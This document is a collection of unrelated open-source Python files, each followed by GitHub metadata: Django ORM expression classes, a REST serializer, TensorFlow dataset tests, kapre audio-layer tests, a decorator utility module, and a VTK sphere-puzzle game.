contains_column_references = True
def __init__(self, alias, target, output_field=None):
if output_field is None:
output_field = target
super(Col, self).__init__(output_field=output_field)
self.alias, self.target = alias, target
def __repr__(self):
return "{}({}, {})".format(
self.__class__.__name__, self.alias, self.target)
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
def get_db_converters(self, connection):
if self.target == self.output_field:
return self.output_field.get_db_converters(connection)
return (self.output_field.get_db_converters(connection) +
self.target.get_db_converters(connection))
class Ref(Expression):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.refs, self.source = refs, source
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
# The sub-expression `source` has already been resolved, as this is
# just a reference to the name of `source`.
return self
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % connection.ops.quote_name(self.refs), []
def get_group_by_cols(self):
return [self]
class ExpressionWrapper(Expression):
"""
An expression that can wrap another expression so that it can provide
extra context to the inner expression, such as the output_field.
"""
def __init__(self, expression, output_field):
super(ExpressionWrapper, self).__init__(output_field=output_field)
self.expression = expression
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
return self.expression.as_sql(compiler, connection)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.expression)
class When(Expression):
template = 'WHEN %(condition)s THEN %(result)s'
def __init__(self, condition=None, then=None, **lookups):
if lookups and condition is None:
condition, lookups = Q(**lookups), None
if condition is None or not isinstance(condition, Q) or lookups:
raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
super(When, self).__init__(output_field=None)
self.condition = condition
self.result = self._parse_expressions(then)[0]
def __str__(self):
return "WHEN %r THEN %r" % (self.condition, self.result)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return [self.condition, self.result]
def set_source_expressions(self, exprs):
self.condition, self.result = exprs
def get_source_fields(self):
# We're only interested in the fields of the result expressions.
return [self.result._output_field_or_none]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
if hasattr(c.condition, 'resolve_expression'):
c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = extra_context
sql_params = []
condition_sql, condition_params = compiler.compile(self.condition)
template_params['condition'] = condition_sql
sql_params.extend(condition_params)
result_sql, result_params = compiler.compile(self.result)
template_params['result'] = result_sql
sql_params.extend(result_params)
template = template or self.template
return template % template_params, sql_params
def get_group_by_cols(self):
# This is not a complete expression and cannot be used in GROUP BY.
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
class Case(Expression):
"""
An SQL searched CASE expression:
CASE
WHEN n > 0
THEN 'positive'
WHEN n < 0
THEN 'negative'
ELSE 'zero'
END
"""
template = 'CASE %(cases)s ELSE %(default)s END'
case_joiner = ' '
def __init__(self, *cases, **extra):
if not all(isinstance(case, When) for case in cases):
raise TypeError("Positional arguments must all be When objects.")
default = extra.pop('default', None)
output_field = extra.pop('output_field', None)
super(Case, self).__init__(output_field)
self.cases = list(cases)
self.default = self._parse_expressions(default)[0]
self.extra = extra
def __str__(self):
return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return self.cases + [self.default]
def set_source_expressions(self, exprs):
self.cases = exprs[:-1]
self.default = exprs[-1]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, case in enumerate(c.cases):
c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def copy(self):
c = super(Case, self).copy()
c.cases = c.cases[:]
return c
def as_sql(self, compiler, connection, template=None, case_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
if not self.cases:
return compiler.compile(self.default)
template_params = self.extra.copy()
template_params.update(extra_context)
case_parts = []
sql_params = []
for case in self.cases:
try:
case_sql, case_params = compiler.compile(case)
except EmptyResultSet:
continue
case_parts.append(case_sql)
sql_params.extend(case_params)
default_sql, default_params = compiler.compile(self.default)
if not case_parts:
return default_sql, default_params
case_joiner = case_joiner or self.case_joiner
template_params['cases'] = case_joiner.join(case_parts)
template_params['default'] = default_sql
sql_params.extend(default_params)
template = template or template_params.get('template', self.template)
sql = template % template_params
if self._output_field_or_none is not None:
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
class Subquery(Expression):
"""
An explicit subquery. It may contain OuterRef() references to the outer
query which will be resolved when it is applied to that query.
"""
template = '(%(subquery)s)'
def __init__(self, queryset, output_field=None, **extra):
self.queryset = queryset
self.extra = extra
if output_field is None and len(self.queryset.query.select) == 1:
output_field = self.queryset.query.select[0].field
super(Subquery, self).__init__(output_field)
def copy(self):
clone = super(Subquery, self).copy()
clone.queryset = clone.queryset.all()
return clone
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
clone = self.copy()
clone.is_summary = summarize
clone.queryset.query.bump_prefix(query)
# Need to recursively resolve these.
def resolve_all(child):
if hasattr(child, 'children'):
[resolve_all(_child) for _child in child.children]
if hasattr(child, 'rhs'):
child.rhs = resolve(child.rhs)
def resolve(child):
if hasattr(child, 'resolve_expression'):
return child.resolve_expression(
query=query, allow_joins=allow_joins, reuse=reuse,
summarize=summarize, for_save=for_save,
)
return child
resolve_all(clone.queryset.query.where)
for key, value in clone.queryset.query.annotations.items():
if isinstance(value, Subquery):
clone.queryset.query.annotations[key] = resolve(value)
return clone
def get_source_expressions(self):
return [
x for x in [
getattr(expr, 'lhs', None)
for expr in self.queryset.query.where.children
] if x
]
def relabeled_clone(self, change_map):
clone = self.copy()
clone.queryset.query = clone.queryset.query.relabeled_clone(change_map)
clone.queryset.query.external_aliases.update(
alias for alias in change_map.values()
if alias not in clone.queryset.query.tables
)
return clone
def as_sql(self, compiler, connection, template=None, **extra_context):
connection.ops.check_expression_support(self)
template_params = self.extra.copy()
template_params.update(extra_context)
template_params['subquery'], sql_params = self.queryset.query.get_compiler(connection=connection).as_sql()
template = template or template_params.get('template', self.template)
sql = template % template_params
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
def _prepare(self, output_field):
# This method will only be called if this instance is the "rhs" in an
# expression: the wrapping () must be removed (as the expression that
# contains this will provide them). SQLite evaluates ((subquery))
# differently than the other databases.
if self.template == '(%(subquery)s)':
clone = self.copy()
clone.template = '%(subquery)s'
return clone
return self
class Exists(Subquery):
template = 'EXISTS(%(subquery)s)'
def __init__(self, *args, **kwargs):
self.negated = kwargs.pop('negated', False)
super(Exists, self).__init__(*args, **kwargs)
def __invert__(self):
return type(self)(self.queryset, self.output_field, negated=(not self.negated), **self.extra)
@property
def output_field(self):
return fields.BooleanField()
def resolve_expression(self, query=None, **kwargs):
# As a performance optimization, remove ordering since EXISTS doesn't
# care about it, just whether or not a row matches.
self.queryset = self.queryset.order_by()
return super(Exists, self).resolve_expression(query, **kwargs)
def as_sql(self, compiler, connection, template=None, **extra_context):
sql, params = super(Exists, self).as_sql(compiler, connection, template, **extra_context)
if self.negated:
sql = 'NOT {}'.format(sql)
return sql, params
def as_oracle(self, compiler, connection, template=None, **extra_context):
# Oracle doesn't allow EXISTS() in the SELECT list, so wrap it with a
# CASE WHEN expression. Change the template since the When expression
# requires a left hand side (column) to compare against.
sql, params = self.as_sql(compiler, connection, template, **extra_context)
sql = 'CASE WHEN {} THEN 1 ELSE 0 END'.format(sql)
return sql, params
class OrderBy(BaseExpression):
template = '%(expression)s %(ordering)s'
def __init__(self, expression, descending=False, nulls_first=False, nulls_last=False):
if nulls_first and nulls_last:
raise ValueError('nulls_first and nulls_last are mutually exclusive')
self.nulls_first = nulls_first
self.nulls_last = nulls_last
self.descending = descending
if not hasattr(expression, 'resolve_expression'):
raise ValueError('expression must be an expression type')
self.expression = expression
def __repr__(self):
return "{}({}, descending={})".format(
self.__class__.__name__, self.expression, self.descending)
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection, template=None, **extra_context):
if not template:
if self.nulls_last:
template = '%s NULLS LAST' % self.template
elif self.nulls_first:
template = '%s NULLS FIRST' % self.template
connection.ops.check_expression_support(self)
expression_sql, params = compiler.compile(self.expression)
placeholders = {
'expression': expression_sql,
'ordering': 'DESC' if self.descending else 'ASC',
}
placeholders.update(extra_context)
template = template or self.template
return (template % placeholders).rstrip(), params
def as_sqlite(self, compiler, connection):
template = None
if self.nulls_last:
template = '%(expression)s IS NULL, %(expression)s %(ordering)s'
elif self.nulls_first:
template = '%(expression)s IS NOT NULL, %(expression)s %(ordering)s'
return self.as_sql(compiler, connection, template=template)
def as_mysql(self, compiler, connection):
template = None
if self.nulls_last:
template = 'IF(ISNULL(%(expression)s),1,0), %(expression)s %(ordering)s '
elif self.nulls_first:
template = 'IF(ISNULL(%(expression)s),0,1), %(expression)s %(ordering)s '
return self.as_sql(compiler, connection, template=template)
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def reverse_ordering(self):
self.descending = not self.descending
return self
def asc(self):
self.descending = False
def desc(self):
self.descending = True
|
{
"content_hash": "81379e47c364689bc02ffe461ab01f55",
"timestamp": "",
"source": "github",
"line_count": 1087,
"max_line_length": 114,
"avg_line_length": 35.723091076356944,
"alnum_prop": 0.6110581751693235,
"repo_name": "twz915/django",
"id": "a1cec2393afe17626830474434e709499c8a4641",
"size": "38831",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/db/models/expressions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55929"
},
{
"name": "HTML",
"bytes": "182880"
},
{
"name": "JavaScript",
"bytes": "252645"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11852079"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
'''Custom error classes.'''
class CollectionError(Exception):
'''Raise when a collection error occurs.'''
|
{
"content_hash": "8e7d69ac31701e3119d2774c40438107",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 47,
"avg_line_length": 18.833333333333332,
"alnum_prop": 0.6902654867256637,
"repo_name": "getavalon/core",
"id": "964e55348e93ccd1cffa598b0ab49923fe08c697",
"size": "218",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "avalon/vendor/clique/error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "688391"
},
{
"name": "Shell",
"bytes": "725"
}
],
"symlink_target": ""
}
|
from collections import OrderedDict
from rest_framework import serializers
class NetworkCollectionSerializer(serializers.ListSerializer):
"""
NetJSON NetworkCollection
"""
@property
def data(self):
return super(serializers.ListSerializer, self).data
def to_representation(self, data):
return OrderedDict(
(
('type', 'NetworkCollection'),
('collection', super().to_representation(data)),
)
)
class NetworkGraphSerializer(serializers.ModelSerializer):
"""
NetJSON NetworkGraph
"""
def to_representation(self, obj):
return obj.json(dict=True)
class Meta:
list_serializer_class = NetworkCollectionSerializer
|
{
"content_hash": "2d90e00ee2250b7119f545cc75c7887f",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 64,
"avg_line_length": 22.818181818181817,
"alnum_prop": 0.6427622841965471,
"repo_name": "interop-dev/django-netjsongraph",
"id": "3323a802c6d1937727d152aa42865704d13a9eca",
"size": "753",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django_netjsongraph/api/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3293"
},
{
"name": "HTML",
"bytes": "3803"
},
{
"name": "JavaScript",
"bytes": "25492"
},
{
"name": "Python",
"bytes": "83655"
}
],
"symlink_target": ""
}
|
"""Tests for datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import flagsaver
from absl.testing import parameterized
from compare_gan import datasets
import tensorflow as tf
FLAGS = flags.FLAGS
_TPU_SUPPORTED_TYPES = {
tf.float32, tf.int32, tf.complex64, tf.int64, tf.bool, tf.bfloat16
}
def _preprocess_fn_id(images, labels):
return {"images": images}, labels
def _preprocess_fn_add_noise(images, labels, seed=None):
del labels
tf.set_random_seed(seed)
noise = tf.random.uniform([128], maxval=1.0)
return {"images": images}, noise
class DatasetsTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super(DatasetsTest, self).setUp()
FLAGS.data_shuffle_buffer_size = 100
def get_element_and_verify_shape(self, dataset_name, expected_shape):
dataset = datasets.get_dataset(dataset_name)
dataset = dataset.eval_input_fn()
image, label = dataset.make_one_shot_iterator().get_next()
# Check if shape is known at compile time, required for TPUs.
self.assertAllEqual(image.shape.as_list(), expected_shape)
self.assertEqual(image.dtype, tf.float32)
self.assertIn(label.dtype, _TPU_SUPPORTED_TYPES)
with self.cached_session() as session:
image = session.run(image)
self.assertEqual(image.shape, expected_shape)
self.assertGreaterEqual(image.min(), 0.0)
self.assertLessEqual(image.max(), 1.0)
def test_mnist(self):
self.get_element_and_verify_shape("mnist", (28, 28, 1))
def test_fashion_mnist(self):
self.get_element_and_verify_shape("fashion-mnist", (28, 28, 1))
def test_celeba(self):
self.get_element_and_verify_shape("celeb_a", (64, 64, 3))
def test_lsun(self):
self.get_element_and_verify_shape("lsun-bedroom", (128, 128, 3))
def _run_train_input_fn(self, dataset_name, preprocess_fn):
dataset = datasets.get_dataset(dataset_name)
with tf.Graph().as_default():
dataset = dataset.input_fn(params={"batch_size": 1},
preprocess_fn=preprocess_fn)
iterator = dataset.make_initializable_iterator()
with self.session() as sess:
sess.run(iterator.initializer)
next_batch = iterator.get_next()
return [sess.run(next_batch) for _ in range(5)]
@parameterized.named_parameters(
("FakeCifar", _preprocess_fn_id),
("FakeCifarWithRandomNoise", _preprocess_fn_add_noise),
)
@flagsaver.flagsaver
def test_train_input_fn_is_determinsitic(self, preprocess_fn):
FLAGS.data_fake_dataset = True
batches1 = self._run_train_input_fn("cifar10", preprocess_fn)
batches2 = self._run_train_input_fn("cifar10", preprocess_fn)
for i in range(len(batches1)):
# Check that both runs got the same images/noise
self.assertAllClose(batches1[i][0], batches2[i][0])
self.assertAllClose(batches1[i][1], batches2[i][1])
@flagsaver.flagsaver
def test_train_input_fn_noise_changes(self):
FLAGS.data_fake_dataset = True
batches = self._run_train_input_fn("cifar10", _preprocess_fn_add_noise)
for i in range(1, len(batches)):
self.assertNotAllClose(batches[0][1], batches[i][1])
self.assertNotAllClose(batches[i - 1][1], batches[i][1])
if __name__ == "__main__":
tf.test.main()
|
{
"content_hash": "95355088941de76d5484dde537df743f",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 75,
"avg_line_length": 33.888888888888886,
"alnum_prop": 0.684053651266766,
"repo_name": "google/compare_gan",
"id": "24eac61b8b9660ed69ed48761219434485ef406f",
"size": "3960",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "compare_gan/datasets_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "104178"
},
{
"name": "Python",
"bytes": "460414"
}
],
"symlink_target": ""
}
|
import pytest
import numpy as np
import tensorflow as tf
import librosa
from kapre import Frame, Energy, MuLawEncoding, MuLawDecoding, LogmelToMFCC
from kapre.backend import _CH_FIRST_STR, _CH_LAST_STR, _CH_DEFAULT_STR
from utils import get_audio, save_load_compare
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('frame_length', [50, 32])
def test_frame_correctness(frame_length, data_format):
hop_length = frame_length // 2
n_ch = 1
src_mono, batch_src, input_shape = get_audio(data_format=data_format, n_ch=n_ch, length=1000)
model = tf.keras.Sequential()
model.add(
Frame(
frame_length=frame_length,
hop_length=hop_length,
pad_end=False,
data_format=data_format,
input_shape=input_shape,
)
)
frames_ref = librosa.util.frame(src_mono, frame_length, hop_length).T # (time, frame_length)
if data_format in (_CH_DEFAULT_STR, _CH_LAST_STR):
frames_ref = np.expand_dims(frames_ref, axis=2)
else:
frames_ref = np.expand_dims(frames_ref, axis=0)
frames_kapre = model.predict(batch_src)[0]
np.testing.assert_equal(frames_kapre, frames_ref)
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
def test_energy_correctness(data_format):
frame_length = 4
hop_length = frame_length // 2
n_ch = 1
src_mono, batch_src, input_shape = get_audio(
data_format=data_format, n_ch=n_ch, length=frame_length * 2
)
sr = 22050
ref_duration = 0.1
model = tf.keras.Sequential()
model.add(
Energy(
sample_rate=sr,
ref_duration=ref_duration,
frame_length=frame_length,
hop_length=hop_length,
pad_end=False,
data_format=data_format,
input_shape=input_shape,
)
)
energies_kapre = model.predict(batch_src)[0]
frames_ref = librosa.util.frame(src_mono, frame_length, hop_length).T # (time, frame_length)
nor_coeff = ref_duration / (frame_length / sr)
energies_ref = nor_coeff * np.sum(frames_ref ** 2, axis=1) # (time, )
if data_format in (_CH_DEFAULT_STR, _CH_LAST_STR):
energies_ref = np.expand_dims(energies_ref, axis=1)
else:
energies_ref = np.expand_dims(energies_ref, axis=0)
np.testing.assert_allclose(energies_kapre, energies_ref, atol=1e-5)
# @pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('data_format', ['default'])
@pytest.mark.parametrize('n_mfccs', [1, 20, 40])
def test_mfcc_correctness(data_format, n_mfccs):
src_mono, batch_src, input_shape = get_audio(data_format='channels_last', n_ch=1)
melgram = librosa.power_to_db(librosa.feature.melspectrogram(src_mono)) # mel, time
mfcc_ref = librosa.feature.mfcc(
S=melgram, n_mfcc=n_mfccs, norm='ortho'
) # 'ortho' -> 5% mismatch but..
expand_dim = (0, 3) if data_format in (_CH_LAST_STR, _CH_DEFAULT_STR) else (0, 1)
melgram_batch = np.expand_dims(melgram.T, expand_dim)
model = tf.keras.Sequential()
model.add(
LogmelToMFCC(n_mfccs=n_mfccs, data_format=data_format, input_shape=melgram_batch.shape[1:])
)
mfcc_kapre = model.predict(melgram_batch)
ch_axis = 1 if data_format == _CH_FIRST_STR else 3
mfcc_kapre = np.squeeze(mfcc_kapre, axis=ch_axis)
mfcc_kapre = mfcc_kapre[0].T
if n_mfccs > 1:
np.testing.assert_allclose(mfcc_ref[1:], mfcc_kapre[1:], atol=1e-4)
np.testing.assert_allclose(mfcc_ref[0], mfcc_kapre[0] / np.sqrt(2.0), atol=1e-4)
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('save_format', ['tf', 'h5'])
def test_save_load(data_format, save_format):
src_mono, batch_src, input_shape = get_audio(data_format='channels_last', n_ch=1)
# test Frame save/load
save_load_compare(
Frame(frame_length=128, hop_length=64, input_shape=input_shape),
batch_src,
np.testing.assert_allclose,
save_format,
Frame,
)
# test Energy save/load
save_load_compare(
Energy(frame_length=128, hop_length=64, input_shape=input_shape),
batch_src,
np.testing.assert_allclose,
save_format,
Energy,
)
# test mu law layers
save_load_compare(
MuLawEncoding(quantization_channels=128),
batch_src,
np.testing.assert_allclose,
save_format,
MuLawEncoding,
)
save_load_compare(
MuLawDecoding(quantization_channels=128),
np.arange(0, 256, 1).reshape((1, 256, 1)),
np.testing.assert_allclose,
save_format,
MuLawDecoding,
)
# test mfcc layer
expand_dim = (0, 3) if data_format in (_CH_LAST_STR, _CH_DEFAULT_STR) else (0, 1)
save_load_compare(
LogmelToMFCC(n_mfccs=10),
np.expand_dims(librosa.power_to_db(librosa.feature.melspectrogram(src_mono).T), expand_dim),
np.testing.assert_allclose,
save_format,
LogmelToMFCC,
)
@pytest.mark.xfail()
def test_wrong_data_format():
Frame(32, 16, data_format='wrong_string')
|
{
"content_hash": "432e9f911d59c247466f80baf573eb39",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 100,
"avg_line_length": 33.52229299363057,
"alnum_prop": 0.6349990499714991,
"repo_name": "keunwoochoi/kapre",
"id": "cb2322b7c9f2422b3335d9d24f3e295b33caa1d2",
"size": "5263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_signal.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "150415"
},
{
"name": "Shell",
"bytes": "96"
}
],
"symlink_target": ""
}
|
from functools import wraps
import inspect
RED = '\033[91m'
BLUE = '\033[94m'
BOLD = '\033[1m'
END = '\033[0m'
def _default_handler(e, *args, **kwargs):
pass
def silence(target_exceptions:list, exception_handler=_default_handler):
def decor(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if isinstance(target_exceptions, list):
for each in target_exceptions:
if isinstance(e, each):
return exception_handler(e, *args, **kwargs)
else:
if isinstance(e, target_exceptions):
return exception_handler(e, *args, **kwargs)
raise e
return wrapper
return decor
def silence_coroutine(target_exceptions:list, exception_handler=_default_handler):
def decor(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return (yield from func(*args, **kwargs))
except Exception as e:
if isinstance(target_exceptions, list):
for each in target_exceptions:
if isinstance(e, each):
return exception_handler(e, *args, **kwargs)
else:
if isinstance(e, target_exceptions):
return exception_handler(e, *args, **kwargs)
raise e
return wrapper
return decor
def log(fn):
"""
logs parameters and result - takes no arguments
"""
TAB_WIDTH = ' '
def func(*args, **kwargs):
if '_DEBUG' in globals() and _DEBUG == True:
arg_string = f""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self":
arg_string += f"{var_name} = {args[i]} : {type(args[i])},"
if len(kwargs):
string = f"{RED}{BOLD}->{END} Calling {fn.__code__.co_name}({arg_string[0:-1]} {kwargs})"
else:
string = f"{RED}{BOLD}->{END} Calling {fn.__code__.co_name}({arg_string[0:-1]})"
offset = TAB_WIDTH * len(inspect.stack(0))
string = offset + string
print(string)
result = fn(*args, **kwargs)
result_string = f"{BLUE}{BOLD}<-{END} {fn.__code__.co_name} returned: {result}"
offset = TAB_WIDTH * len(inspect.stack(0))
result_string = offset + result_string
print(result_string)
return result
else:
return fn(*args, **kwargs)
return func
def logx(supress_args=[], supress_all_args=False, supress_result=False, receiver=None):
"""
logs parameters and result
takes arguments
supress_args - list of parameter names to supress
supress_all_args - boolean to supress all arguments
supress_result - boolean to supress result
receiver - custom logging function which takes a string as input; defaults to logging on stdout
"""
def decorator(fn):
def func(*args, **kwargs):
if not supress_all_args:
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self" and var_name not in supress_args:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__code__.co_name, arg_string))
if len(kwargs):
string = (
RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(
fn.__code__.co_name,
arg_string, kwargs))
if receiver:
receiver(string)
else:
print(string)
result = fn(*args, **kwargs)
if not supress_result:
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result :{1}'.format(fn.__code__.co_name, result)
if receiver:
receiver(string)
else:
print(string)
return result
return func
return decorator
def value_check(arg_name, pos, allowed_values):
"""
allows value checking at runtime for args or kwargs
"""
def decorator(fn):
# brevity compromised in favour of readability
def logic(*args, **kwargs):
arg_count = len(args)
if arg_count:
if pos < arg_count:
if args[pos] in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError(
"'{0}' at position {1} not in allowed values {2}".format(args[pos], pos, allowed_values))
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if value in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError("'{0}' is not an allowed kwarg".format(arg_name))
else:
# partially applied functions because of incomplete args, let python handle this
return fn(*args, **kwargs)
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if value in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError("'{0}' is not an allowed kwarg".format(arg_name))
return logic
return decorator
def type_check(arg_name, pos, reqd_type):
"""
allows type checking at runtime for args or kwargs
"""
def decorator(fn):
# brevity compromised in favour of readability
def logic(*args, **kwargs):
arg_count = len(args)
if arg_count:
if pos < arg_count:
if isinstance(args[pos], reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' at position {1} not of type {2}".format(args[pos], pos, reqd_type))
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if isinstance(value, reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' is not of type {1}".format(arg_name, reqd_type))
else:
# partially applied functions because of incomplete args, let python handle this
return fn(*args, **kwargs)
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if isinstance(value, reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' is not of type {1}".format(arg_name, reqd_type))
return logic
return decorator
|
{
"content_hash": "763f9ad78e884731cc7d3df24dd5dd40",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 118,
"avg_line_length": 35.65714285714286,
"alnum_prop": 0.4776976495726496,
"repo_name": "kashifrazzaqui/again",
"id": "d435845bc92aea8f3076861327cad1739c418734",
"size": "7488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "again/decorate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21910"
}
],
"symlink_target": ""
}
|
# A game with VTK and tkinter. :)
import sys
if sys.hexversion < 0x03000000:
# for Python2
import Tkinter as tkinter
else:
# for Python3
import tkinter
import vtk
from vtk.tk.vtkTkRenderWindowInteractor import vtkTkRenderWindowInteractor
# Create the pipeline
puzzle = vtk.vtkSpherePuzzle()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(puzzle.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
arrows = vtk.vtkSpherePuzzleArrows()
mapper2 = vtk.vtkPolyDataMapper()
mapper2.SetInputConnection(arrows.GetOutputPort())
actor2 = vtk.vtkActor()
actor2.SetMapper(mapper2)
renWin = vtk.vtkRenderWindow()
ren = vtk.vtkRenderer()
renWin.AddRenderer(ren)
# Add the actors to the renderer, set the background and size
ren.AddActor(actor)
ren.AddActor(actor2)
ren.SetBackground(0.1, 0.2, 0.4)
ren.ResetCamera()
cam = ren.GetActiveCamera()
cam.Elevation(-40)
## Generate the GUI
root = tkinter.Tk()
root.withdraw()
# Define a quit method that exits cleanly.
def quit(obj=root):
obj.quit()
# Create the toplevel window
top = tkinter.Toplevel(root)
top.title("Sphere Puzzle")
top.protocol("WM_DELETE_WINDOW", quit)
# Create some frames
f1 = tkinter.Frame(top)
f2 = tkinter.Frame(top)
f1.pack(side="top", anchor="n", expand=1, fill="both")
f2.pack(side="bottom", anchor="s", expand="t", fill="x")
# Create the Tk render widget, and bind the events
rw = vtkTkRenderWindowInteractor(f1, width=400, height=400, rw=renWin)
rw.pack(expand="t", fill="both")
def reset(evt=None):
puzzle.Reset()
renWin.Render()
# Display some information
l1 = tkinter.Label(f2, text="Position cursor over the rotation plane.")
l2 = tkinter.Label(f2, text="Moving pieces will be highlighted.")
l3 = tkinter.Label(f2, text="Press 'm' to make a move.")
reset = tkinter.Button(f2, text="Reset", command=reset)
b1 = tkinter.Button(f2, text="Quit", command=quit)
for i in (l1, l2, l3, reset, b1):
i.pack(side="top", expand="t", fill="x")
# Done with the GUI. Create callback functions.
in_piece_rotation = 0
LastVal = None
# Highlight pieces
def MotionCallback(obj, event):
global in_piece_rotation
global LastVal
if in_piece_rotation:
return
iren = renWin.GetInteractor()
istyle = iren.GetInteractorStyle().GetCurrentStyle()
# Return if the user is performing interaction
if istyle.GetState():
return
# Get mouse position
pos = iren.GetEventPosition()
x, y = pos
# Get world point
ren.SetDisplayPoint(x, y, ren.GetZ(x, y))
ren.DisplayToWorld()
pt = ren.GetWorldPoint()
val = puzzle.SetPoint(pt[0], pt[1], pt[2])
if (not LastVal) or val != LastVal:
renWin.Render()
LastVal = val
# Rotate the puzzle
def CharCallback(obj, event):
iren = renWin.GetInteractor()
keycode = iren.GetKeyCode()
if keycode != "m" and keycode != "M":
return
pos = iren.GetEventPosition()
ButtonCallback(pos[0], pos[1])
def ButtonCallback(x, y):
global in_piece_rotation
if in_piece_rotation:
return
in_piece_rotation = 1
# Get world point
ren.SetDisplayPoint(x, y, ren.GetZ(x,y))
ren.DisplayToWorld()
pt = ren.GetWorldPoint()
x, y, z = pt[:3]
for i in range(0, 101, 10):
puzzle.SetPoint(x, y, z)
puzzle.MovePoint(i)
renWin.Render()
root.update()
in_piece_rotation = 0
root.update()
# Modify some bindings, use the interactor style 'switch'
iren = renWin.GetInteractor()
istyle = vtk.vtkInteractorStyleSwitch()
iren.SetInteractorStyle(istyle)
istyle.SetCurrentStyleToTrackballCamera()
iren.AddObserver("MouseMoveEvent", MotionCallback)
iren.AddObserver("CharEvent", CharCallback)
# Shuffle the puzzle
ButtonCallback(218, 195)
ButtonCallback(261, 128)
ButtonCallback(213, 107)
